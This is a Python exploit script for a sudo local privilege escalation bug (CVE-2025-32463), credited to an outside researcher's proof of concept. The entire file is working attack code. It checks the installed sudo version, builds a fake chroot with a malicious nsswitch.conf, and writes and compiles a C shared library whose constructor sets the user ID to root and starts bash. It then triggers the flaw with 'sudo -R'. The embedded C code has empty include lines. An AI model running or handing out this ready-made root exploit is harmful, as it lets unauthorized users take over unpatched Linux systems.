#!/bin/python3 # Exploit Title : Sudo local privilege escalation via chroot through /etc/nsswitch.conf from a user-controlled directory. # Author : Pevinkumar A # Date : 02/07/2025 # Affected versions : sudo 1.9.14 to 1.9.17 # CVE: CVE-2025-32463 # Vendor: Sudo Project # Maintainer: Todd C. Miller # Tested versions : 1.9.15p5 , 1.9.16p2 # Identified by : Rich Mirch (Stratascale Cyber Research Unit). # Reference: Bash PoC by Stratascale Cyber Research Unit (CRU) team # License : MIT import os import subprocess import tempfile def check_vulnerablity() -> None: """ Function to check the vulnerability existance. Args: None Returns: Bool: True if vulnerable ,else quit. """ print("[ + ] checking the version of sudo.") vulnerable_versions = [ "1.9.14", "1.9.14p1", "1.9.14p2", "1.9.14p3", "1.9.14p4", "1.9.14p5", "1.9.15", "1.9.15p1", "1.9.15p2", "1.9.15p3", "1.9.15p4", "1.9.15p5", "1.9.16", "1.9.16p1", "1.9.16p2", "1.9.17" ] version = subprocess.check_output("sudo --version | sed -n 's/^Sudo version \\([0-9.]*p*[0-9]*\\)/\\1/p'",shell=True,text=True) if version.strip() in vulnerable_versions: return True else: print('[ ! ] Looks it is not vulnerable for CVE-2025-32463.') quit() def setup_tmp_dir() -> None: """ Function to setup temporary directory for the exploitation. Args: None Returns: None """ prefix = 'CVE-2025-32463_' try: fd = tempfile.TemporaryDirectory(prefix=prefix) return fd, fd.name except Exception as E: print(f"[ ! ] Couldn't create temporary directory: {E}") exit(1) def setup_required_directories(tmp_location: str) -> None: """ Function to setup required subdirectories under temporary darectory. Args: tmp_location (str): Temporary directory location for the exploitation. Returns: None """ required_directories = [ "libnss_", "woot", "woot/etc" ] for directory in required_directories: directory_location = os.path.join(tmp_location,directory) os.makedirs(directory_location,exist_ok=True) def config_nss(tmp_location: str) -> None: """ Function to configure the Name Service Switch configuration. Args: tmp_location (str): Temporary directory location for the exploitation. Returns: None """ try: data = "passwd: /woot1337\n" nss_config_location = os.path.join(tmp_location,"woot","etc","nsswitch.conf") with open(nss_config_location,'w') as opened_nss_config: opened_nss_config.write(data) print("[ + ] Configured nss file.") except Exception as E: print(f"[ ! ] Couldn't config the nss: {E}") exit(1) def copy_group(tmp_location: str) -> None: """ Function to copy the local group to the temporary directory. Args: tmp_location (str): Temporary directory location for the exploitation. Returns: None """ try: copy_destination = os.path.join(tmp_location,"woot","etc","group") with open("/etc/group",'r') as group_file: group_details = group_file.read() with open(copy_destination,'w') as group: group.write(group_details) print("[ + ] Group details copy to the temporary location.") except Exception as E: print(f"[ ! ] Couldn't copy the group contant: {E}") exit(1) def save_exploit(tmp_location:str) -> None: """ Function to save the exploit (c code) in the temporary directory. Args: tmp_location (str): Temporary directory location for the exploitation. Returns: None """ try: c_file_name = "CVE-2025-32463.c" c_code = """ #include #include __attribute__((constructor)) void woot(void) { setreuid(0,0); setregid(0,0); chdir("/"); execl("/bin/bash", "/bin/bash", NULL); } """ c_file = os.path.join(tmp_location,c_file_name) with open(c_file,'w') as opened_c_file: opened_c_file.write(c_code) print("[ + ] Exploit saved.") except Exception as E: print(f"[ ! ] Couldn't save the exploit in temporary directory: {E}") exit(1) def compile_exploit(tmp_location:str) -> None: """ Function to compile the exploit. Args: tmp_location (str): Temporary directory location for the exploitation. Returns: None """ shared_file_name = "woot1337.so.2" c_file = os.path.join(tmp_location,"CVE-2025-32463.c") shared_file_output = os.path.join(tmp_location,"libnss_",shared_file_name) compile_status = subprocess.run(['gcc','-shared','-fPIC','-Wl,-init,woot','-o',shared_file_output,c_file],capture_output=True,text=True) if compile_status.returncode: print(f"[ ! ] Couldn't compile the exploit in temporary directory.") print("[ + ] Exploit compiled successfully.") def exploit(tmp_location:str) -> None: """ Function to exploit the CVE-2025-32463. Args: tmp_location (str): Temporary directory location for the exploitation. Returns: None """ try: os.chdir(tmp_location) subprocess.call(["sudo", "-R", "woot", "woot"]) except Exception as E: print("[ + ] Couldn't exploit the vulnerability, somthing went wrong !!") exit(1) def main() -> None: """ Main function for the exploit. Args: None Returns: None """ vulnerability_check = check_vulnerablity() if vulnerability_check: print('[ + ] Vulnerable for CVE-2025-32463.') print("[ + ] Setting up temporary directory.") fd, temporary_dir_locaction = setup_tmp_dir() print("[ + ] Creating required directories.") setup_required_directories(tmp_location=temporary_dir_locaction) print("[ + ] Configuring nss.") config_nss(tmp_location=temporary_dir_locaction) print("[ + ] Copying the group to the tmp/etc location.") copy_group(tmp_location=temporary_dir_locaction) print("[ + ] Saving the exploit in temporary directory.") save_exploit(tmp_location=temporary_dir_locaction) print("[ + ] Compiling the exploit.") compile_exploit(tmp_location=temporary_dir_locaction) print("[ + ] Exploiting...") exploit(tmp_location=temporary_dir_locaction) print("[ + ] Cleaning up.") fd.cleanup() if __name__ == "__main__": main()